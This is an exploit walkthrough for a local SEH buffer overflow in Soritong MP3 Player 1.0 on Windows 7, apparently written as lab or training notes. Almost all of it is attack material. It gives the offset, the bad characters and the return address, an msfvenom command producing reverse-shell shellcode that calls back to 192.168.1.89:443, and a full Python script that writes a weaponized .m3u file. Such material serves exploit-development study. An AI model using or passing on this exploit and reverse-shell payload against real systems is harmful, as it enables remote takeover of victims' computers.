Soritong MP3 Player 1.0 - Local Buffer Overflow (SEH) Walkthrough

(Updated: )
reference Soritong MP3 Player 1.0 - Local Buffer Overflow (SEH)
os name Microsoft Windows 7 Professional
os version 6.1.7601 Service Pack 1 Build 7601
system type x86-based PC

I’ve also downloaded strmdll.dll, wmaudsdk.dll, drmclien.dll.

badchar

omitted
\x00\x0a\0xd

offset

omitted
264

return address

seh

omitted
Player.DLL 0x1001af39

shellcode

1
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.89 LPORT=443 -f python -v shellcode -b "\x00\x0a\x0d"

exploit.py

exploit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
# badchar \x00\x0a\x0d
shellcode =  b""
shellcode += b"\xdb\xd2\xd9\x74\x24\xf4\xbb\xc3\x0b\xa5\xc5"
shellcode += b"\x5f\x31\xc9\xb1\x52\x31\x5f\x17\x83\xc7\x04"
shellcode += b"\x03\x9c\x18\x47\x30\xde\xf7\x05\xbb\x1e\x08"
shellcode += b"\x6a\x35\xfb\x39\xaa\x21\x88\x6a\x1a\x21\xdc"
shellcode += b"\x86\xd1\x67\xf4\x1d\x97\xaf\xfb\x96\x12\x96"
shellcode += b"\x32\x26\x0e\xea\x55\xa4\x4d\x3f\xb5\x95\x9d"
shellcode += b"\x32\xb4\xd2\xc0\xbf\xe4\x8b\x8f\x12\x18\xbf"
shellcode += b"\xda\xae\x93\xf3\xcb\xb6\x40\x43\xed\x97\xd7"
shellcode += b"\xdf\xb4\x37\xd6\x0c\xcd\x71\xc0\x51\xe8\xc8"
shellcode += b"\x7b\xa1\x86\xca\xad\xfb\x67\x60\x90\x33\x9a"
shellcode += b"\x78\xd5\xf4\x45\x0f\x2f\x07\xfb\x08\xf4\x75"
shellcode += b"\x27\x9c\xee\xde\xac\x06\xca\xdf\x61\xd0\x99"
shellcode += b"\xec\xce\x96\xc5\xf0\xd1\x7b\x7e\x0c\x59\x7a"
shellcode += b"\x50\x84\x19\x59\x74\xcc\xfa\xc0\x2d\xa8\xad"
shellcode += b"\xfd\x2d\x13\x11\x58\x26\xbe\x46\xd1\x65\xd7"
shellcode += b"\xab\xd8\x95\x27\xa4\x6b\xe6\x15\x6b\xc0\x60"
shellcode += b"\x16\xe4\xce\x77\x59\xdf\xb7\xe7\xa4\xe0\xc7"
shellcode += b"\x2e\x63\xb4\x97\x58\x42\xb5\x73\x98\x6b\x60"
shellcode += b"\xd3\xc8\xc3\xdb\x94\xb8\xa3\x8b\x7c\xd2\x2b"
shellcode += b"\xf3\x9d\xdd\xe1\x9c\x34\x24\x62\x63\x60\x27"
shellcode += b"\x2b\x0b\x73\x27\xca\x70\xfa\xc1\xa6\x96\xab"
shellcode += b"\x5a\x5f\x0e\xf6\x10\xfe\xcf\x2c\x5d\xc0\x44"
shellcode += b"\xc3\xa2\x8f\xac\xae\xb0\x78\x5d\xe5\xea\x2f"
shellcode += b"\x62\xd3\x82\xac\xf1\xb8\x52\xba\xe9\x16\x05"
shellcode += b"\xeb\xdc\x6e\xc3\x01\x46\xd9\xf1\xdb\x1e\x22"
shellcode += b"\xb1\x07\xe3\xad\x38\xc5\x5f\x8a\x2a\x13\x5f"
shellcode += b"\x96\x1e\xcb\x36\x40\xc8\xad\xe0\x22\xa2\x67"
shellcode += b"\x5e\xed\x22\xf1\xac\x2e\x34\xfe\xf8\xd8\xd8"
shellcode += b"\x4f\x55\x9d\xe7\x60\x31\x29\x90\x9c\xa1\xd6"
shellcode += b"\x4b\x25\xd1\x9c\xd1\x0c\x7a\x79\x80\x0c\xe7"
shellcode += b"\x7a\x7f\x52\x1e\xf9\x75\x2b\xe5\xe1\xfc\x2e"
shellcode += b"\xa1\xa5\xed\x42\xba\x43\x11\xf0\xbb\x41"

payload = "A" * (264 - 4)
payload += "\xeb\x06\x41\x41"
payload += "\x39\xaf\x01\x10"
payload += "\x90" * 16
payload += shellcode
payload += "C" * (5000 - 264 - 4 - 16 - len(shellcode))

with open("exploit.m3u", "w") as fp:
    fp.write(payload)

proof

Open File->Open Files